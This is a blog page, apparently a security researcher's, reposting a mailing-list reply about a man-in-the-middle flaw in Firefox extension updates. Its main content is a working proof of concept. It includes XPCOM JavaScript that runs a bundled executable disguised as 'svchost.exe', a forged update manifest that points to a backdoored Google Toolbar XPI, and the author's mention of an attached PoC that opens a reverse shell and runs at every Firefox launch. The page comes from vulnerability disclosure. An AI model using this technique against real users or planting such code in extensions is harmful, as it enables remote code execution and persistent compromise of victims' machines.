Very good and detailed advisory, I came up with the same issue about one month ago and developed two PoCs.
Here is the hash : http://ferruh.mavituna.com/makale/firefox-hash/ (shame on me that I haven't sent to any public mail-list. If you really curious check out RSS caches and google cache) and brief explanation is in the attachment (Firefox-MITM.txt).
I attached Google Toolbar PoC. Be careful it's throwing a reverse shell also I got a PoC for Linux as well.
To clarify things, you can execute arbitrary code with current user's rights.
Here is a sample code, -------------------- exepath = Components.classes["mozilla.org/file/directory_service;1"].getService( Components.interfaces.nsIProperties).get("ProfD", Components.interfaces.nsIFile).path + "\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe"; runFile(exepath);
function runFile(f) { var file = Components.classes["mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(f);
var process = Components.classes["mozilla.org/process/util;1"] .createInstance(Components.interfaces.nsIProcess);
process.init(file);
var args = [""]; process.run(false, args, args.length); }
--------------------
Sample update response XML, ---------- <?xml version="1.0"?><RDF:RDF xmlns:RDF=" http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em=" http://www.mozilla.org/2004/em-rdf#"> <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}"> <em:updates><RDF:Seq> <RDF:li resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}: 4.0.0.16"/> </RDF:Seq></em:updates></RDF:Description> <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16 "> <em:version>4.0.0.16</em:version> <em:targetApplication><RDF:Description> <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <em:minVersion>1.5.0</em:minVersion> <em:maxVersion>2.9.99</em:maxVersion> <em:updateLink> http://192.168.1.130/firefox/google.xpi</em:updateLink> </RDF:Description></em:targetApplication></RDF:Description> </RDF:RDF> ---------- This is our backdoored xpi file url : http://192.168.1.130/firefox/google.xpi I modified the google-toolbar.xul and added to run svchost.exe file which is in xpi file as well.
Sample xpi file attached, modified version of google toolbar extension and it will work every time you launch Firefox.
Yorumlar
Yorum Ekle
Firefox Hash ile İlişkili Olabilecek Yazılar - Haberler
RgodMS08-006 Exploit
Flawed CSRF Protections
Exploit Hash
Hala Güvenli misiniz?
Diğer Yazılar
Firefox Linux, Feci bir açık
Firefox Master Password Dialog Weakness
Firefox ta da Soultip
Firefox' ta kolay gizlenme
Firefox' u Kirletmek ve Korumak
Firefox, Internet Explorer da XMLHTTP ile çalışmak
Firefox, SSL ve MITM (Man in the Middle)
Firekeeper - Firefox IDS
Firewall Sinemalara Geliyor...
Fireworks MX 2004 Yenilikleri
Fireworks MX 2004 Yenilikleri
First Move, Destroying more than 500GB data!
Fischerspooner
Fiyatlandırmada Eski Teknikler
Flash Gordon oho hooo
Flash olmayan bir Macromedia.com istiyoruz
Flash Paper ' a detaylı bir bakış, analizler ve Yeni bir standart arayışı
Flash Paper' a Detaylı bir bakış
Flash Player 7.0 Public Beta
Neredeyim ?
Ferruh.Mavituna » Aç Karna Güvenlik » Firefox Hash